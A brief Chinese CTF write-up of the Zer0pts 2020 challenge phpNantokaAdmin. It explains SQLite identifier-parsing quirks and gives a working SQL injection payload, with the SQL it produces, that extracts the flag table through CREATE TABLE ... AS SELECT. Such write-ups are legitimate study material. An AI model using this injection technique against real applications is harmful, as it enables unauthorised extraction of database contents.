刷题记录:[Zer0pts2020]phpNantokaAdmin

题目复现链接:https://buuoj.cn/challenges
参考链接:Zer0pts CTF 2020

sqlite bypass技巧

  • select的时候,当列名用空白字符隔开时,sqlite只会把空格之前的字符当做列名,并且忽视空格后的字符

  • []'"`、一样可以包裹列名

  • sqlite可以create table ... as select ...

解题

posttable_name=[aaa]as select [flag_2a2d04c3][&columns[0][name]=]from flag_bf1811da;&columns[0][type]=2
最后拼接出来的sql语句是

create table [aaa] as select [flag_2a2d04c3][(dummy1 TEXT, dummy2 TEXT,`]from flag_bf1811da;`2);
posted @ 2020-05-08 17:34  MustaphaMond  阅读(1058)  评论(0编辑  收藏  举报